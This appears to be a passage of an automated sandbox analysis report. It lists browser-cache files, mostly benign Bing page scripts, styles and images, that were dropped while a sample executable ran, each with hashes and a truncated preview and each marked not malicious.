                                                                                                                                                                                                        Preview:.PNG........IHDR...a.................pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..l.IDATx....u.7.0.A......@...T`o.f*.SA...T`...+0UA..BU.X....a,.......u..:.%..`... ..........a. ......................N.....o..z..=.....r!..^..Rr.....J..b.{..x...9^....u.^.?+.......!..kQ`.....$YNo\/..km.4.n...........1H.0\e.$]^w..K.^....r{I......0.I.v.@!...6.r\..JI..n..9W......<.$.O.0.3]...W.|..n.B&%c.)......cI...e.K.^4....ZX!......C$a..rl.x....|%..I...x.]........I..m..a.?.vml76.O.:.lW........0|..!.M..D4.%..Yt..1+......h.$........w..c.B......&I..._.e..R.%c......#..b.K...d.....@c$aZ*....&..R4.F2........0-.r..n.|y#..H.Y..VB.....P....n!......MZ..W,.E.........>V..Z.!..E.ND#{..:...\(......!.Sc..0....Dq....eK......(.$LM.i.K->t.d.g......(.3a*.~.......x.b........\V.^..C...A.....Y......@Y..)X.a.?V..L.R.^.~+......e..)T....x....2.=..y..............L./..!..:^..}.........Y.S...i.Xv.0-K.b>.p&......y.......r..~./>u.U1+........0..!.:..x]...Z(......#.....<~.....s..........

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\sbi[1].htm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (33353)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):50932
                                                                                                                                                                                                        Entropy (8bit):5.481937509795144
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:okuL2ym/YIZE2u16tNz14nO2sya0yO7JUDWvjygz+YI2QFSOc+YIXFWCPP6bzATo:9wPySjyK4FWCqbwONiqP7CAz
                                                                                                                                                                                                        MD5:3B23C7FDE0782E5C750D3FC47BF49BC3
                                                                                                                                                                                                        SHA1:7678C8847E764F85BE04A73BD29E777799195487
                                                                                                                                                                                                        SHA-256:DF22AD42AC234CAF5014C42783FCC21214E77F1750B571964BB6A3FDC3984733
                                                                                                                                                                                                        SHA-512:D0038834B7BC904D67E49DF29E5B4AE0C5BCE354EE053B2740613A909CBBA7AED338E9BB06B8BAC70281E4413EAAF96A3504565636DB225F58C0CA4CF353EA3C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<style type="text/css">#sbiarea,#sbicom{display:none}.hassbi #sbiarea{display:inline-block}#sbiarea{margin:0 0 0 18px}.sbox #sb_form #sbiarea{margin:0}#sb_sbi{display:inline-block;cursor:pointer}img#sbi_b{vertical-align:-2px;height:18px;width:18px}#detailPage #detailheader img#sbi_b,.blue2#miniheader img#sbi_b,.sbox img#sbi_b{vertical-align:-3px}.blue2#miniheader img#sbi_b{vertical-align:-1px}#sbi_b.grayscaled{filter:grayscale(1) brightness(1.4);-webkit-filter:grayscale(1) brightness(1.4)}#sbi_b.grayscaled:hover{filter:grayscale(1) brightness(1);-webkit-filter:grayscale(1) brightness(1)}#sb_sbip[shdlg] #sbi_b{filter:grayscale(0);-webkit-filter:grayscale(0)}#sb_sbip .rms_iac{display:inline-block}#sb_sbip:not(.disableTooltip):hover::before,#sb_sbip.shtip:not(.disableTooltip)::before,#sb_sbip[vptest]::before{bottom:-27px;left:10px;z-index:6}#sb_sbip:not(.disableTooltip):hover::after,#sb_sbip.shtip:not(.disableTooltip)::after,#sb_sbip[vptest]::after{top:40px;left:10px;z-index:4}#hp_contain

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\yjXVFOxf6UdoTA2BOwEH6n4ClfI.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1274
                                                                                                                                                                                                        Entropy (8bit):5.30620342636407
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                                                                                                                                                        MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                                                                                                                                                        SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                                                                                                                                                        SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                                                                                                                                                        SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3tdN5-aUjXHlyFDCP-W57B-Gjkg.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1578), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1578
                                                                                                                                                                                                        Entropy (8bit):5.329734499973321
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QDoc8McY0tjLr4H5uRlcHeO0M2AieYIriev+OmbTkC6+xbDntex3CcldxQp3j7O:NfZuRy0N1eYZ0waSbO3CBp/GiCHAhG
                                                                                                                                                                                                        MD5:0C0AD3FD8C0F48386B239455D60F772E
                                                                                                                                                                                                        SHA1:F76EC2CF6388DD2F61ADB5DAB8301F20451846FA
                                                                                                                                                                                                        SHA-256:DB6DDE4AEF63304DF67B89F427019D29632345D8B3B5FE1B55980F5D78D6E1E7
                                                                                                                                                                                                        SHA-512:E45A51EF2F0021F168A70AC49BDCC7F4FB7B91FF0DDD931F8ECBD70F6494C56285B2D9BC1170804801CE178244CCF361745B677B04C388B608D1471E0695EBEB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function d(n,t){for(var r=[],i=0;i<t.length;i++)r.push({MonitorID:t[i].name,RequestID:t[i].guid,Result:Math.round(n[i])});return JSON.stringify(r)}function u(){function n(){return Math.floor((1+Math.random())*65536).toString(16).substring(1)}return n()+n()+n()+n()+n()+n()+n()+n()}function h(){return window.performance&&window.performance.getEntriesByName?!0:!1}function c(n,t,i,r,u,f){function l(i){var w,b,p,k,y,g,nt;if(e!=null&&sb_ct(e),s[i]=c!=null?(new Date).getTime()-c:-1,i=(a+v)%n.length,o=new Image,a++<n.length)c=(new Date).getTime(),o.onload=function(){l(i)},w=function(){o.onload=null;o.onerror=null;c=null;l(i)},e=sb_st(function(){w()},t),o.onerror=function(){e!=null&&sb_ct(e);e=null;w()},o.src=n[i];else{if(r!=null&&r.length!==0){if(h())for(y=0;y<n.length;y++)b=n[y],p=window.performance.getEntriesByName(b),s[y]!=-1&&p&&p[0]&&(s[y]=p[0].duration);for(k=d(s,u),y=0;y<r.length;y++)g=r[y],nt=new Image,nt.src=g+k}f!=null&&f()}}var c,e,s=[],v=Math.floor(Math.random()*n.lengt

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\5g-N9K-X1ykUl3QHEadPjpOM0Tc.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1060
                                                                                                                                                                                                        Entropy (8bit):5.351152776949957
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1nAA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGD0zRPo
                                                                                                                                                                                                        MD5:F4DA106E481B3E221792289864C2D02A
                                                                                                                                                                                                        SHA1:D8BA5C1615A4A8ED8EE93C5C8E2EA0FB490A0994
                                                                                                                                                                                                        SHA-256:47CB84D180C1D6BA7578C379BDC396102043B31233544E25A5A6F738BB425AC9
                                                                                                                                                                                                        SHA-512:66518EE1B6C0DF613074E500A393E973844529CA81437C4BAFE6BF111CBA4D697AF4FE36B8D1B2AA9B25F3EB93CD76DF63ABFC3269AC7E9F87C5F28A3764008E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(document.body,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\GK9SuRKiu0QbKYnVgoAlgmuWrNU.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2524), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2524
                                                                                                                                                                                                        Entropy (8bit):5.496443534651084
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:PvB3ugs9kys5b+qM4qKr+KOHaH4ZMLSyKQug1LL7j:PvB89kyPWqKKKOHY4Z+zn
                                                                                                                                                                                                        MD5:17CDAB99027114DBCBD9D573C5B7A8A9
                                                                                                                                                                                                        SHA1:42D65CAAE34EBA7A051342B24972665E61FA6AE2
                                                                                                                                                                                                        SHA-256:5FF6B0F0620AA14559D5D869DBEB96FEBC4014051FA7D5DF20223B10B35312DE
                                                                                                                                                                                                        SHA-512:1FE83B7EC455840A8DDB4EEDBBCD017F4B6183772A9643D40117A96D5FFF70E8083E424D64DEBA209E0EF2E54368ACD58E16E47A6810D6595E1D89D90BCA149A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var RewardsHeaderSVG;(function(n){function w(){s()}function b(n,t){var i=sj_cook.get(h,l);t?n.indexOf(i)>-1?o():s():k()>0&&o()}function o(){g();sb_st(nt,u);sb_st(d,u)}function k(){var n=sj_cook.get(c,a);return parseInt(n)}function d(){sj_evt.fire(v)}function s(){sj_evt.fire(y)}function g(){var u=_ge(r),n;_ge(t)&&Lib.CssClass.add(_ge(t),"rd_hide");_ge(i)&&Lib.CssClass.add(_ge(i),"rd_hide");u&&(n=document.createElement("img"),n.setAttribute("id","coinFlipGif"),n.setAttribute("class","rhcoinflip"),n.setAttribute("src",p),u.appendChild(n),u.style.display="block")}function nt(){_ge(r).style.display="none";_ge(t)&&Lib.CssClass.remove(_ge(t),"rd_hide");_ge(i)&&Lib.CssClass.remove(_ge(i),"rd_hide")}var h="_RwBf",c="_SS",l="v",a="RP",r="coinFlipGifContainer",t="rewards_header_icon serp",i="rewards_header_icon hp",v="rewardsRedDot",y="redDotAnimation",u=1750,p="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/coin_flip_3d.gif",f=_d.querySelector(".rhlined.serp, .rhlined.hp"),e=_d.que

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Hn5jlJXmmG-j_-qM12eoTYPXFrI.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19674), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19674
                                                                                                                                                                                                        Entropy (8bit):5.33240026231163
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:3Wsj/9Npzk8fbw3QMXmwOAahGvyBJeXiOOF240eApyfYRxW+:3z/PpzkLXmw0onXi9F24Ypw43
                                                                                                                                                                                                        MD5:5704A84AC0573BDBF11A8DA6582410C6
                                                                                                                                                                                                        SHA1:7FE63892DFBB4AE078F5B784A31B29E981E22523
                                                                                                                                                                                                        SHA-256:525FA9E3B57ABEE5ED411C5EBA2F74DFF25D2591BBC142A976DE1604E2502D9E
                                                                                                                                                                                                        SHA-512:4DF7C5152CC7A9BE28A650A3C275B9F9880139D640268E3266968EB585F813E6178FEE193D8348B5DA386A3893E54FD40A3B6149275DB404D3511F27532D8170
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Icon[1].png

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):533
                                                                                                                                                                                                        Entropy (8bit):7.415663553371965
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:6v/7Ya7/6Ts/o7hJW8/t8oX8qUkUGGVIXC/zoZ3VYZwWSVR:E/6pzWK+q/UGGMC/zw3oGVR
                                                                                                                                                                                                        MD5:B6162D100379E7F4EF709BA5C26D1BA8
                                                                                                                                                                                                        SHA1:AEA4244C56F00AA26064134863157A6EE9D7ABB9
                                                                                                                                                                                                        SHA-256:DCA74022BEBB4F12F8EFADD226C9413CAFFF9193420D604DE8A398642172AACA
                                                                                                                                                                                                        SHA-512:CC64207C45F85255F34A157C9370A46EBD4A2B3A674E639838EF7582FD93D68F91A275C577E2FC9A46674EC765D8CC43A5BE28B281FCD5006D38D0C6F02E2058
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.PNG........IHDR...<... .....N.......pHYs.................sRGB.........gAMA......a.....IDATx..=O.1....$....1..7.....p32..)..Yw..p..IL.$qT'......1.#.h..j.5...9...~...w.....oe.....]8,..|..........``.$a.K.&Lq........D,D..8e.c.....fQ...u..%.(..b..8A......,>@6....Y*...9.(...d7........,!zr.N...T}.....j...NY'..|.=N2Q&<?3....@..-.e.h....F#..2.v...n..!-.e..&........%.e........y.c.y,.e........4'40.t"...B.........D.../[D..6j....^>.....g...3...5<Hv.H../M.+Y`.......OXw<a.al..aF.@.../.E....=;S.K....s.......IEND.B`.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NRudXMsXYtnM1BQyD6xvAZoudZM.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):667
                                                                                                                                                                                                        Entropy (8bit):5.251512275863699
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:fr5esz7hNGwXI2QA3QglxfLQOtKfWM1kI2JGC+t5821xw9i/UJpN0I:fr5NhNGOgAggDDQOtjMbhH582Ugk0I
                                                                                                                                                                                                        MD5:2AB12BF4A9E00A1F96849EBB31E03D48
                                                                                                                                                                                                        SHA1:7214619173C4EC069BE1FF00DD61092FD2981AF0
                                                                                                                                                                                                        SHA-256:F8B5ACF4DA28E0617F1C81093192D044BD5A6CC2A2E0C77677F859ADCF3430AC
                                                                                                                                                                                                        SHA-512:7D5AAE775BE1E482EADA1F453BEA2C52A62C552FA94949E6A6081F322E679E916B1276BB59FF28CF7C86D21727BCC329ECB03E5D77CA93204E0CD2694FAA72BD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:sb_ie&&function(){function h(){if(t){var u=n.replace(/www\./i,"");return f&&i(t,r,n+"?PC="+f)||i(t,r,n)||i(t,r,u)||i(t,r,n+"?Form=HPPDH1")||i(t,r,n+"?PC=BNHP")||i(t,r,n+"?PC=BNSR")}return 0}function c(){return i(_w.external,s,n)!=0}function l(){if(u){var n=2*e+o;if(u==n)return!0}return!1}function a(){var n=_ge("hps");return n||(n=sj_ce("span","hps"),n.style.behavior="url(#default#homepage)",sj_b.appendChild(n)),n}function i(n,t,i){try{return n[t](i)}catch(r){return 0}}var s="IsSearchProviderInstalled",r="isHomepage",n="http://"+_d.domain+"/",u=sj_cook.get("_UR","D"),f=sj_cook.get("SRCHS","PC"),t=a(),e=h(),o=c();l()||(u=2*e+o,sj_cook.set("_UR","D",u,1,"/"))}()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\UYtUYDcn1oZlFG-YfBPz59zejYI[1].svg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):964
                                                                                                                                                                                                        Entropy (8bit):4.421237058266115
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:t741nTY2jmYXhgauOwgXl3gHuWg9cZLzix9QiVCVCTikxQmQ6Nkpgeoo7:dQnkwXhnuOwIlwHuW7nC9QkaUzQm3Nk5
                                                                                                                                                                                                        MD5:88E3ED3DD7EEE133F73FFB9D36B04B6F
                                                                                                                                                                                                        SHA1:518B54603727D68665146F987C13F3E7DCDE8D82
                                                                                                                                                                                                        SHA-256:A39AB0A67C08D907EDDB18741460399232202C26648D676A22AD06E9C1D874CB
                                                                                                                                                                                                        SHA-512:90FF1284A7FEB9555DFC869644BD5DF8A022AE7873547292D8F6A31BA0808613B6A7F23CB416572ADB298EEE0998E0270B78F41C619D84AB379D0CA9D1D9DA6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16"><g fill="#00809D"><path d="M2.25 0h-1.25c-.263 0-.521.107-.707.293-.186.186-.293.444-.293.707v1.25c0 .552.448 1 1 1s1-.448 1-1v-.25h.25c.552 0 1-.448 1-1s-.448-1-1-1zM1 8.75c.552 0 1-.448 1-1v-1.5c0-.552-.448-1-1-1s-1 .448-1 1v1.5c0 .552.448 1 1 1zM2.25 12h-.25v-.25c0-.552-.448-1-1-1s-1 .448-1 1v1.25c0 .263.107.521.293.707s.444.293.707.293h1.25c.552 0 1-.448 1-1s-.448-1-1-1zM11.75 2h.25v.25c0 .552.448 1 1 1s1-.448 1-1v-1.25c0-.263-.107-.521-.293-.707-.186-.186-.444-.293-.707-.293h-1.25c-.552 0-1 .448-1 1s.448 1 1 1zM6.25 2h1.5c.552 0 1-.448 1-1s-.448-1-1-1h-1.5c-.552 0-1 .448-1 1s.448 1 1 1zM14.5 7h-.5v-.75c0-.552-.448-1-1-1s-1 .448-1 1v.75h-3.5c-.828 0-1.5.671-1.5 1.5v3.5h-.75c-.552 0-1 .448-1 1s.448 1 1 1h.75v.5c0 .828.672 1.5 1.5 1.5h6c.828 0 1.5-.672 1.5-1.5v-6c0-.829-.672-1.5-1.5-1.5z"/></g><path fill="none" d="M0 0h16v16h-16z"/></svg>

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VLm4tyiMlywwyg4FgWjZITn5W48.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (357), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):357
                                                                                                                                                                                                        Entropy (8bit):5.100320804030099
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8Ed7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mqJFO:2QVlY8EbgRUGhS+eTKb2PVESq8qrO
                                                                                                                                                                                                        MD5:2DF9793CF020A37C88178BE84311427A
                                                                                                                                                                                                        SHA1:29CFE86239722D4F4AF07C494D676092896A8600
                                                                                                                                                                                                        SHA-256:A69D257EEE41E843881D548D2E4EE5A0727B889AB22BFFDAA8ED1074E802BCC6
                                                                                                                                                                                                        SHA-512:E9A35EC1E466FEB3E273FB991A3282BA1C45FD0EACEA956E9821914CC4261377684B062BDE888EBF5767BBC055DB191DC14E00AF8037B5607449C06E5D2DD082
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\W8bLYGpay8IFp3H_SrUDKaBAn30.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                        Entropy (8bit):5.285209446790883
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                                                                                                                                                        MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                                                                                                                                                        SHA1:394194F8DD058927314D41E065961B476084F724
                                                                                                                                                                                                        SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                                                                                                                                                        SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YE0zdCVEXmngId3Qg4LQkqvjyLE.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21920)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):21951
                                                                                                                                                                                                        Entropy (8bit):5.3573914200107335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Kh4kT1lYxfqyDOhKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzueAi:Y5Tifh3bBpBnqIH+Z6sepXv0uQaV
                                                                                                                                                                                                        MD5:51775361FD842E7E41AF84A01C8AB92C
                                                                                                                                                                                                        SHA1:21D108490F70991727A3B044983342517336B53F
                                                                                                                                                                                                        SHA-256:8B549EEF372338FC3F5632B9BD47AD2C2876229E573095CCBC6B7867A47153F9
                                                                                                                                                                                                        SHA-512:96FD8D92BA98B65B4BD34FF57F351123EA907C3DC91A4814F8DE3E6985B6BC9CA0972F8E6CBEE072F50742CA5F19D03F623C32EB5061C9CA1D6A3CFB47344DCE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func

